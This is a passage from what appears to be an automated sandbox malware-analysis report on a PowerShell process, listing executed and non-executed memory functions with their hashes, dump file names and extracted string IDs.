                                            • Opcode ID: 3424828dfe49b9085be31b4353cad5b34437c492fc93667bb881db060d2f31b4
                                            • Instruction ID: b8f5f747e709bc94250600577536173c3a57bc4d8bc323e7428aa2ec004b5f33
                                            • Opcode Fuzzy Hash: 3424828dfe49b9085be31b4353cad5b34437c492fc93667bb881db060d2f31b4
                                            • Instruction Fuzzy Hash: E42161B270031A9BF7385AF9484077B76DA9BC5711F24843AE60DDBAC1DE75D941C360
                                            Function 073B0DFD Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cff9ee1a81000256ab30c278cf0fc476232e171116a0f63c7d5897fd0e40b32
                                            • Instruction ID: 6ebc6b2b5a793c0ca06dedb5dfe424f396ce33b0749fe847e255a4e1c2fc4727
                                            • Opcode Fuzzy Hash: 1cff9ee1a81000256ab30c278cf0fc476232e171116a0f63c7d5897fd0e40b32
                                            • Instruction Fuzzy Hash: 322180B270435A5FFB385AE54900BBB7BD65FC5700F288466EA08DB6D1CA75DA40C760
                                            Function 073B0C08 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5608fdfc4f6c6f9233475b187aeaddcad0b16384c5647a34419d6cb8d08738ba
                                            • Instruction ID: e1ab324eaa8f89dfee258b2acfd6083f235d19dbe8451a4191f5ce78dffd4a91
                                            • Opcode Fuzzy Hash: 5608fdfc4f6c6f9233475b187aeaddcad0b16384c5647a34419d6cb8d08738ba
                                            • Instruction Fuzzy Hash: 7001F77631031A8BE73855AA94005BBB799DBC2662F14C43ED6CDCFA51DB32C945C760
                                            Function 02FED01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542068388.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2fed000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa4f5a31fa86473c5aeea37ac1e88f846a9f77ba9153d8e5111cfbffc5fe0e18
                                            • Instruction ID: 1a0aecf0cbc5e2461263c5f58af7dd4b65bfcaec2bfecaf37fe6bf4700b91554
                                            • Opcode Fuzzy Hash: fa4f5a31fa86473c5aeea37ac1e88f846a9f77ba9153d8e5111cfbffc5fe0e18
                                            • Instruction Fuzzy Hash: D401FC31905300AEEB214F25C984756BB9CDF41AA4F0CC159EF450F546C3759441CAB1
                                            Function 02FED005 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542068388.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2fed000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 457df80ae541dcb5709f80497c170eedff051a2e00a46830725456188fefe898
                                            • Instruction ID: 45a0fcc8355f150f1b8cefbf73b1f97214d5b1a95ee13ab51e55fa5175030d34
                                            • Opcode Fuzzy Hash: 457df80ae541dcb5709f80497c170eedff051a2e00a46830725456188fefe898
                                            • Instruction Fuzzy Hash: C6019E2240E3C09FE7138B258894B52BFB8DF43624F0DC1DBD9888F1A7C2694849CB72
                                            Function 030531E3 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c927e11f538a1deb44039eff71f5c29755a007a8a45b552a1c5434641632e4
                                            • Instruction ID: 52b046a66418388b9c78d1cfad0b51ee6f8e978dd08186de08b853d113b03498
                                            • Opcode Fuzzy Hash: 08c927e11f538a1deb44039eff71f5c29755a007a8a45b552a1c5434641632e4
                                            • Instruction Fuzzy Hash: E8016778B006149FDB00DF98D890AAEF771FF9D310B248599D95AA7361C635EC43CB50
                                            Function 03053166 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe22978c6422ea1eeb7a2776881ea0442a25c51de6b924efcb2bf9fa8319dee3
                                            • Instruction ID: 33fb0255f9e04979b54a0132acfc1d628e339326c53ed799a874fa336e7bc94c
                                            • Opcode Fuzzy Hash: fe22978c6422ea1eeb7a2776881ea0442a25c51de6b924efcb2bf9fa8319dee3
                                            • Instruction Fuzzy Hash: 70F03435A001089FCB14CF9CD890AEEF7B1FF88324F208199E515A72A0C336EC52CB60
                                            Function 073B6264 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9f2fa707fc203052bcd1e13e4222e8ce636214944f5d8954a0b3e7b6a6c9d49
                                            • Instruction ID: 368fcfed86a358d82fbc0f9203a391953cfefad1d89c94787b9b403ae900cbdd
                                            • Opcode Fuzzy Hash: c9f2fa707fc203052bcd1e13e4222e8ce636214944f5d8954a0b3e7b6a6c9d49
                                            • Instruction Fuzzy Hash: 25F065B5109285CFE3268B6488515D0BF71AFC721071D91DBD1C88F5ABC626BA43C752

                                            Non-executed Functions

                                            Function 073B55A0 Relevance: 12.8, Strings: 10, Instructions: 324COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-4104424984
                                            • Opcode ID: ea2f74a7e515610a90648f62a44db20f6a2f352be0593b5ca74e76f9f3050b5a
                                            • Instruction ID: c8f7b99cced4eb58f82b577dd9dadff28adf60cda61871c4ea6c1826c3fecf78
                                            • Opcode Fuzzy Hash: ea2f74a7e515610a90648f62a44db20f6a2f352be0593b5ca74e76f9f3050b5a
                                            • Instruction Fuzzy Hash: A8A16CB1B04306CFF7344A69D8407EAB7A5EFC6251F14807BE60ACBA51DB31C961C7A1
                                            Function 073B3248 Relevance: 10.3, Strings: 8, Instructions: 322COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                            • API String ID: 0-2958727440
                                            • Opcode ID: 046a7ed2058dc3ffc63ff98760ce6e72bc52c0cfe130f2f3ec9d2fbaf5cec4bc
                                            • Instruction ID: 927241ce690068e8da06fa81c06e7729d52d36f62e9cf80683bd37b25f5f6365
                                            • Opcode Fuzzy Hash: 046a7ed2058dc3ffc63ff98760ce6e72bc52c0cfe130f2f3ec9d2fbaf5cec4bc
                                            • Instruction Fuzzy Hash: D9A138B27043258FF7354A69C8407ABBBA5EFC6610F24807BD60DCBA51DE32D846C761
                                            Function 073B2D18 Relevance: 9.2, Strings: 7, Instructions: 412COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q
                                            • API String ID: 0-1337834377
                                            • Opcode ID: 5d54883ed310286ac4083eae55ebb05077af555182b94d038983ca4917027357
                                            • Instruction ID: b33fa420b89bc426d4f5f07b45f2e8726a2fb6a352dc2942f42e836668287919
                                            • Opcode Fuzzy Hash: 5d54883ed310286ac4083eae55ebb05077af555182b94d038983ca4917027357
                                            • Instruction Fuzzy Hash: F9D14DB1B05315CFF7319B6988017EBBBB6EFC6210F14817AD60ACBA51DA31D846C792
                                            Function 073BCC00 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                            • API String ID: 0-1538229613
                                            • Opcode ID: 04326d0399bfc88411367a747f9f36dd5a65ccaf7d09f2eba75493a66dc92bdb
                                            • Instruction ID: f7ddae91e984883ebf9b0b7e65862d6216ab71dd88dfc446b2c442a398196b5b
                                            • Opcode Fuzzy Hash: 04326d0399bfc88411367a747f9f36dd5a65ccaf7d09f2eba75493a66dc92bdb
                                            • Instruction Fuzzy Hash: 57610CB570420ACFEB348E69C4042EABBA6EFD5211F14D07AD549CBA50DB31C842C7B0
                                            Function 073BE544 Relevance: 6.4, Strings: 5, Instructions: 193COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 6ae0d0471374cba01b347af5dd3b764ec358d272932ea6b5c84a78b3888c8f21
                                            • Instruction ID: a722c11a3e1a88e3e95ce9a7dc8580fa3392525ddda8b92496e7be17302a3fb5
                                            • Opcode Fuzzy Hash: 6ae0d0471374cba01b347af5dd3b764ec358d272932ea6b5c84a78b3888c8f21
                                            • Instruction Fuzzy Hash: E761D7F4A80206DFFB34CE5CC5457FA77A6AF49711F188466EA099BA90C771DC80CBA1
                                            Function 073BE558 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 58becdd5449cd8a5f42266cb03bd5a70b03feab6d532d954844dab7f197ee8bf
                                            • Instruction ID: 3a3592b290a5d39be9f708f77d2ecc260bc92083cc89ef79f2de4bb04a78e02f
                                            • Opcode Fuzzy Hash: 58becdd5449cd8a5f42266cb03bd5a70b03feab6d532d954844dab7f197ee8bf
                                            • Instruction Fuzzy Hash: A761D6F4A8020ADFFB34CE1CC5457EA77A6AF49711F188465EA099BA90C771DC80CBA1
                                            Function 073BDB3C Relevance: 6.4, Strings: 5, Instructions: 162COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 7f1397908fcf20e15a1085e46d29f187072cbfff7eca7426cf96ddde55cfe1c8
                                            • Instruction ID: 7235e2e89f7497e64397076e6c19a165649cd7cfd15594ea70d3fe6a06233348
                                            • Opcode Fuzzy Hash: 7f1397908fcf20e15a1085e46d29f187072cbfff7eca7426cf96ddde55cfe1c8
                                            • Instruction Fuzzy Hash: 4B51C0F1720206EFEB38CE14C5407E5B7A6AF45711F58806AEA4D9BEA0C372D880CB91
                                            Function 073BDB50 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 91bc317dd8b101fac86dde77403c4137605b571f45dbead88e074fec559e2f4c
                                            • Instruction ID: 2da32ee9bf32604a12ea5ccebded7de0a39bfc9faaf03717020435a164dd045f
                                            • Opcode Fuzzy Hash: 91bc317dd8b101fac86dde77403c4137605b571f45dbead88e074fec559e2f4c
                                            • Instruction Fuzzy Hash: 9C51A1F1720206EBFB38CE44C5447E5B7A6AF45711F58806AEA4D9BEA0C772D980CB91
                                            Function 073BB638 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 888322f10a429d6976f0117eb671fc32b5ce723a3317e0b213791c6ce0e78534
                                            • Instruction ID: 861578b39a89d1f0c42a35e58e65e88eaa34cec82d51c7dcab169ed0548f9ffd
                                            • Opcode Fuzzy Hash: 888322f10a429d6976f0117eb671fc32b5ce723a3317e0b213791c6ce0e78534
                                            • Instruction Fuzzy Hash: 8C31B5F1A00205DBFB348E49C542BE9F7A6AF89710F18C06ADA1D9BA51CF71DD40CB91
                                            Function 073B5768 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$$q$$q$$q$$q
                                            • API String ID: 0-1023332887
                                            • Opcode ID: 759c6b0d3d2e90bbfd8c35403524dedafe9cf5a812477679b168dc1e3d48ee8a
                                            • Instruction ID: 520492eddab8393db24f40f0fc8c20aeeb5c8bb54608169f40a3e80c11181b36
                                            • Opcode Fuzzy Hash: 759c6b0d3d2e90bbfd8c35403524dedafe9cf5a812477679b168dc1e3d48ee8a
                                            • Instruction Fuzzy Hash: 692150F1B1030BDFFB348E05C9416F5BBA9AF81A51F58806AEA0CCBD51C775D9A0CA91
                                            Function 073BCEB8 Relevance: 5.5, Strings: 4, Instructions: 479COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (oq$(oq$(oq$(oq
                                            • API String ID: 0-3853041632
                                            • Opcode ID: 0241f64cb05dc93eb48440f815f5cfecc41fbce5a0e7669cf85c25a75ac1c510
                                            • Instruction ID: 22c23a5057b7ced01ddfb4dd0e0632c8b2af9c499e7ad09aa93fb3f930b284e8
                                            • Opcode Fuzzy Hash: 0241f64cb05dc93eb48440f815f5cfecc41fbce5a0e7669cf85c25a75ac1c510
                                            • Instruction Fuzzy Hash: 6EF108B1714346DFEB349F68C8447EABBA2EFC5310F14847AE6098BA91CB32D945C761
                                            Function 073B4C80 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$tPq$tPq
                                            • API String ID: 0-1392854178
                                            • Opcode ID: d522fb7a518ba24f327721bc2958511876fe3b5ef2c3b002470a6dc13919d948
                                            • Instruction ID: eac73a8f9ffd693da72dbd7aef434a4e9eca229cda838b6322cec50d956e51d7
                                            • Opcode Fuzzy Hash: d522fb7a518ba24f327721bc2958511876fe3b5ef2c3b002470a6dc13919d948
                                            • Instruction Fuzzy Hash: 74C15EB27053418FF7348A6998417BAB7A2DFC1614F14847BD609CBA83EF32D852C7A1
                                            Function 073B5100 Relevance: 5.2, Strings: 4, Instructions: 225COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: 9ff9b5cd6191cd759ec7fae508334876a45c7a97e01bdf4c37d869de9a032cec
                                            • Instruction ID: af3cdf6a8f08d43b8f646bbb30956b4612adeacf4bc66f8c322503046852f452
                                            • Opcode Fuzzy Hash: 9ff9b5cd6191cd759ec7fae508334876a45c7a97e01bdf4c37d869de9a032cec
                                            • Instruction Fuzzy Hash: D9612AB1B013098FEB349A7998016EFB7A6EFC5610F14807AD60ECBB41DB31D966C791
                                            Function 073BDE8C Relevance: 5.2, Strings: 4, Instructions: 204COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$tPq$$q
                                            • API String ID: 0-3421759962
                                            • Opcode ID: 1335478a54f5373bd17461e27c77a929c77a088203c70e8fa81f2134608c8cbc
                                            • Instruction ID: ad74a6f758a3ee642d6a46743a9e06bd03e3e4ad1739a402381313ff724b7297
                                            • Opcode Fuzzy Hash: 1335478a54f5373bd17461e27c77a929c77a088203c70e8fa81f2134608c8cbc
                                            • Instruction Fuzzy Hash: A971F8F0B51205DFEB34CE59C540BE9B7F6AF89311F28849AEA085BA51C731ED41CB91
                                            Function 073BDEA0 Relevance: 5.2, Strings: 4, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$tPq$$q
                                            • API String ID: 0-3421759962
                                            • Opcode ID: b40ff1fed3585c7b85e800e8e4acab4764b2f2d05ba390de7f101af19e1e6f5f
                                            • Instruction ID: 2ff444c9cd5192004e0a4d516ee08842789fe167ae6b72b8789f0afd5f2a79cc
                                            • Opcode Fuzzy Hash: b40ff1fed3585c7b85e800e8e4acab4764b2f2d05ba390de7f101af19e1e6f5f
                                            • Instruction Fuzzy Hash: 0261E7F0B51205DFEB34CE59C940BE9B7F6AF89311F288499EA086BA50C731ED41CB51
                                            Function 073BC2A8 Relevance: 5.2, Strings: 4, Instructions: 176COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: f7cbe0bb4caf933087ff2485b0df1d879841e7a256cbdad2743accf4cd58a32e
                                            • Instruction ID: 9ac0bdad6806858e70cdb67648f825487a71bfe067a1981a68ba87a6737315e7
                                            • Opcode Fuzzy Hash: f7cbe0bb4caf933087ff2485b0df1d879841e7a256cbdad2743accf4cd58a32e
                                            • Instruction Fuzzy Hash: 5151EAF2B0021B8FEB358A6D84102FAB7A69FC5511F14907BD60ECBA10DA36C956C7B1
                                            Function 073B1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 00b015ea16db30ab346582ea148efd63fb65822de204ce3747ebb5adef871b31
                                            • Instruction ID: 5a56bce199fd620f9fbf45fdfc7757db6d2d320b07f145a938511eff462f3c8b
                                            • Opcode Fuzzy Hash: 00b015ea16db30ab346582ea148efd63fb65822de204ce3747ebb5adef871b31
                                            • Instruction Fuzzy Hash: 932168B271034A9BFB345A6E8C607A7F3DA9BC1615F34843BA60DCBB85CD75C8018361
                                            Function 073BB8C8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 899670e77a22507dac4665ab5aaba65733e885d567046f6dd1ad7aaf638d1093
                                            • Instruction ID: b66490e0503d39314fb6922f388993bff292a413a5a7d1653942f6598a91d17c
                                            • Opcode Fuzzy Hash: 899670e77a22507dac4665ab5aaba65733e885d567046f6dd1ad7aaf638d1093
                                            • Instruction Fuzzy Hash: 87119DF1A0030ADBEF318E6689406FAFBA8AF81610F58406ADA0D97A01DF35C544CB91
                                            Function 073B1D49 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q
                                            • API String ID: 0-3199993180
                                            • Opcode ID: c64f216f7bd416a8a83478adc976cf2b537328d7db7702060ca3c5cbe77c4236
                                            • Instruction ID: 843880a0f90fb77c10e54de343c361ec16b85c0de2fffcfa537ecfb1b2bd3c08
                                            • Opcode Fuzzy Hash: c64f216f7bd416a8a83478adc976cf2b537328d7db7702060ca3c5cbe77c4236
                                            • Instruction Fuzzy Hash: CF012B6270939A4FE33A036948302B56BB25FC394076B80A7C246DB797CD55CC478757